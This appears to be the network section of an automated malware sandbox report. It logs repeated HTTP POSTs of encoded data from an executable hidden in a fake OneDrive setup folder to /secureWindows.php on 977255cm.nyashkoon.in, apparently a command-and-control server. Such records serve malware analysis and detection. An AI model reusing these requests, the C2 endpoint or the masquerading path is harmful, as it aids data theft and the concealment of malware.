                                                        CF-RAY: 8da8a0af0d532e18-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1569&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=965333&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        65192.168.2.449828188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:02.731684923 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:03.089859009 CET1076OUTData Raw: 57 5f 5c 5d 55 54 56 5c 58 57 50 59 55 50 5b 53 54 5c 5c 58 59 57 5a 5d 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: W_\]UTV\XWPYUP[ST\\XYWZ]]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&8 =(238,&0%.?; 7[&7(5$(&:* F$,Z*
                                                        Oct 30, 2024 05:23:03.343373060 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:03.642236948 CET785INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:03 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rr55i%2BlhArEZ%2BrVgTgtD4s9YSHlgcU4GgrHtMAdZPqHqTwDq%2F28aU5V2dlLDlvAFNL2Y7QhOcEWBWNZyOUjCbnFLq3ko2vCvvUF%2B0hsvP%2FqLNMW0o6GH70ppkOygKpXnB43bzhbTsw4%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0b57c5f3171-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1472&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1067059&cwnd=247&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:03.642267942 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        66192.168.2.449834188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:03.789321899 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:04.149643898 CET1076OUTData Raw: 52 55 5c 50 50 58 53 57 58 57 50 59 55 5e 5b 5f 54 5b 5c 54 59 50 5a 5c 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RU\PPXSWXWPYU^[_T[\TYPZ\]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%\8#2Y+"Y0=+C950_2[,X,44#Z2*<<&)'+&. F$,Z*=
                                                        Oct 30, 2024 05:23:04.384022951 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:04.736706972 CET792INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:04 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iTXpV%2FSWMEoQYM%2FxD0%2B1DRNVU0N99DBJoU8NGeGbCICmYspmwVbuQPrMG%2Fzy20xCVulIqCFqHt4K4xEsRCMfzyy6h2V7ijf35kOMzWiBRd6mgu6P%2BjkKf7Fltj%2FGYI7wT3MQPRU888g%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0bc0f206bf6-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1048&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1423795&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        67192.168.2.449840188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:04.865916967 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:05.215023041 CET1076OUTData Raw: 57 53 5c 57 55 55 56 55 58 57 50 59 55 5a 5b 58 54 53 5c 58 59 53 5a 5e 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\WUUVUXWPYUZ[XTS\XYSZ^]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%Z/9<81$<.$%=?, \#$&)6*38):: F$,Z*-
                                                        Oct 30, 2024 05:23:05.463927031 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:05.779983044 CET782INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:05 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ee4hrKMMhjWkU2ANukxqQNnpIlH4%2Bu53kpyJDnx9O8zBcU9YxnLIFynPenZ4h2y77qmVQHhHI1iyXXnvTR9cxLOsw%2BFBPMRHo5iQdP1uu%2B9iGAKsCeNTPpGU4DTkr8YslxBo%2B3yG4W0%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0c2caf83160-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2237&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=643555&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:05.780004978 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        68192.168.2.449846188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:05.911597013 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1072
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:06.261605978 CET1072OUTData Raw: 57 50 59 55 55 5a 56 56 58 57 50 59 55 58 5b 58 54 5d 5c 5a 59 56 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WPYUUZVVXWPYUX[XT]\ZYVZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&8 :Y?2]'>;9%>0Z8:$\4Z&9??=$X/: F$,Z*-
                                                        Oct 30, 2024 05:23:06.538000107 CET25INHTTP/1.1 100 Continue


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        69192.168.2.449852188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:06.706988096 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1340
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:07.058449984 CET1340OUTData Raw: 57 51 5c 5c 50 5d 56 56 58 57 50 59 55 5b 5b 59 54 53 5c 59 59 55 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WQ\\P]VVXWPYU[[YTS\YYUZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%\/*X+!3=C95 \2=+-*[4\27]?C=3- F$,Z*)
                                                        Oct 30, 2024 05:23:07.305577040 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:07.516115904 CET935INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2FzVUv%2BRrUmIanJii2KWpX1RBWZ2vxK7Oso9aHzE72Jwtz6Ix%2Bj3AD0xSRY45u4AXysB65GojdklUgVSFFtDBWANyAeYvPz1l71nWopKNfPqHMsMnbAlNUu3bhKphdipR6vyVPZQm6U%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0ce48a5e843-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1548&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1650&delivery_rate=1194719&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 39 38 0d 0a 01 1f 26 57 3c 28 27 0f 32 0d 00 58 3c 2f 32 00 28 3e 3e 15 24 1f 02 14 25 12 3a 5f 2a 38 30 00 3d 0a 34 1d 2b 1c 2c 5c 37 36 2f 00 3e 2b 2f 46 0c 10 24 00 27 31 2f 52 2b 0a 25 1f 2a 16 0d 1a 20 20 0f 04 28 29 2b 51 21 1d 37 07 33 32 2a 53 38 3e 2e 52 2e 25 0c 5a 39 0d 3c 52 3e 3a 21 57 08 14 21 03 25 5a 3b 1b 32 2e 24 14 32 32 25 07 37 2c 3b 5c 21 38 22 13 28 02 37 0b 32 09 23 03 24 55 37 52 26 39 3c 5b 3e 31 3c 0c 32 19 22 52 2e 0d 20 56 03 32 58 53 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 98&W<('2X</2(>>$%:_*80=4+,\76/>+/F$'1/R+%* ()+Q!732*S8>.R.%Z9<R>:!W!%Z;2.$22%7,;\!8"(72#$U7R&9<[>1<2"R. V2XS0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        70192.168.2.449853188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:06.828289986 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:07.183403969 CET1076OUTData Raw: 52 52 5c 56 55 55 53 52 58 57 50 59 55 51 5b 59 54 5d 5c 5f 59 50 5a 5a 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RR\VUUSRXWPYUQ[YT]\_YPZZ]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%_;1+>3=(-67%=0_,: '\&0<%&89: F$,Z*
                                                        Oct 30, 2024 05:23:07.454967976 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:07.656579971 CET792INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:07 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BAqPkIKn6D4f%2BvlFHVxdr1Ou0ciTLVndxTuvnwOmPdzgcpjRcgYd1jyeBSzCvLRQ6ijSZBwo%2FhSMUHs8t%2FfOLdxBHKt1%2FVevo5CBLggUBiujav7enI%2Bu7enCJFu9WVa2xm0BBNaq%2Bds%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0cf397e6bd4-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1189&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1310407&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        71192.168.2.449859188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:07.781783104 CET286OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Oct 30, 2024 05:23:08.136507034 CET1076OUTData Raw: 52 50 59 50 55 59 56 55 58 57 50 59 55 50 5b 5a 54 52 5c 5d 59 5d 5a 5b 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RPYPUYVUXWPYUP[ZTR\]Y]Z[]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%[8 "X+'/D:%]%>?;97"*7Z')#+"$;%- F$,Z*
                                                        Oct 30, 2024 05:23:08.382311106 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:08.702347040 CET782INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:08 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J3v%2FnZc%2B7JnhHDwIZtX%2B9vED7YKKTIC0EB0tolF0MLScyqkd9qpEMO5946mPwlhwV%2BpoNZWerawkBioW1LZIbITGc9XFcfbmCYGfs70XR4E1pR1d3pVAYgmojudAkvcH8OgLqRnRkgY%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0d508b835a0-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=992&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1362&delivery_rate=1511482&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a
                                                        Data Ascii: 43W_Y
                                                        Oct 30, 2024 05:23:08.702375889 CET5INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        72192.168.2.449865188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:08.825757027 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:09.183337927 CET1076OUTData Raw: 52 54 5c 51 55 54 56 54 58 57 50 59 55 5c 5b 59 54 53 5c 5e 59 56 5a 5f 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: RT\QUTVTXWPYU\[YTS\^YVZ_]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R&/.?'>#@.&32[$_/:<X#2?^(C5[0:- F$,Z*5
                                                        Oct 30, 2024 05:23:09.423645973 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:09.620367050 CET802INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:09 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GqWIxoKCC%2BmCn4nGIpVJ%2FQbUSk1afavcFKl%2Bcf0u7Q1f%2Bl9o%2B%2BdBys1MwgL%2FqwZEukN5%2FKzzsBb0mCNcjdZF7%2BNrA4uopHxxoVys4MmAUXDpQsBGCkDdIcb9j7ylcStIuJvTH%2FF%2B2C8%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0db8fcf4769-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1123&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1375118&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        73192.168.2.449873188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:09.753035069 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:10.105279922 CET1076OUTData Raw: 57 55 5c 56 55 55 53 57 58 57 50 59 55 5e 5b 59 54 5e 5c 54 59 5c 5a 54 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WU\VUUSWXWPYU^[YT^\TY\ZT]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%8#2=(\'<-6#&;87 %90(6!Z3+). F$,Z*=
                                                        Oct 30, 2024 05:23:10.348525047 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:10.557111025 CET788INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eZqN2pqNr9Eczn7uVZAUZ3Dl05x15oc7wDkciiNGhPEerBSxtm%2FraQtBteVE0MiS5gAbxn%2FPNYXN18wkfPsWT1gquJjaLAz9hAAefly8oye5Pga%2FvJXFJ6SZgdBUmTYsIliQuL%2F6WfE%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0e15cf76c7c-DFW
                                                        alt-svc: h3=":443"; ma=86400
                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1074&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1386&delivery_rate=1399033&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                        Data Raw: 34 0d 0a 33 57 5f 59 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 43W_Y0


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        74192.168.2.449881188.114.96.3807760C:\ProgramData\Microsoft OneDrive\setup\DViaOgnvmAhwCXZ.exe
                                                        TimestampBytes transferredDirectionData
                                                        Oct 30, 2024 05:23:10.693362951 CET310OUTPOST /secureWindows.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                        Host: 977255cm.nyashkoon.in
                                                        Content-Length: 1076
                                                        Expect: 100-continue
                                                        Connection: Keep-Alive
                                                        Oct 30, 2024 05:23:11.042876005 CET1076OUTData Raw: 57 53 5c 56 55 5d 56 5c 58 57 50 59 55 59 5b 59 54 5a 5c 5d 59 51 5a 59 5d 59 58 5e 53 5e 55 52 43 45 52 52 50 57 52 5d 5d 57 53 5a 52 59 50 42 5a 5c 5d 5b 5f 57 51 53 55 52 5b 5d 57 59 59 5b 5e 51 58 5e 54 58 55 54 59 56 5e 5a 5a 50 59 56 54 58
                                                        Data Ascii: WS\VU]V\XWPYUY[YTZ\]YQZY]YX^S^URCERRPWR]]WSZRYPBZ\][_WQSUR[]WYY[^QX^TXUTYV^ZZPYVTXTWV@TYSWVTFZ[T[_XQX^YY[]Z\]T\\^]Y^_[Q[VX[R[TB_ZUU^^__YBQYT^DXTT\\\V_^]_WZQ[@UTZZTTSRUV]\RYX_T_[_\^\Q_R%,:?^10;9%3%[/;? 72+Y<5>'-Z9: F$,Z*!
                                                        Oct 30, 2024 05:23:11.275542974 CET25INHTTP/1.1 100 Continue
                                                        Oct 30, 2024 05:23:11.467158079 CET786INHTTP/1.1 200 OK
                                                        Date: Wed, 30 Oct 2024 04:23:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        cf-cache-status: DYNAMIC
                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5EfnLAJEfOgY1GRc6triPMTEIs%2FiLn5mDesuocrhlrolBfhyA3YfYAz7OWeCSpqxNVIIOQoU1HdPIY7zQQfZw5s0YuIv8z6ws4%2FHNcBH7G8PWYBUxepb9TBvGVzmu5xTxvRr%2Bs3M0CQ%3D"}],"group":"cf-nel","max_age":604800}
                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                        Server: cloudflare
                                                        CF-RAY: 8da8a0e72d344786-DFW
                                                        alt-svc: h3=":443"; ma=86400
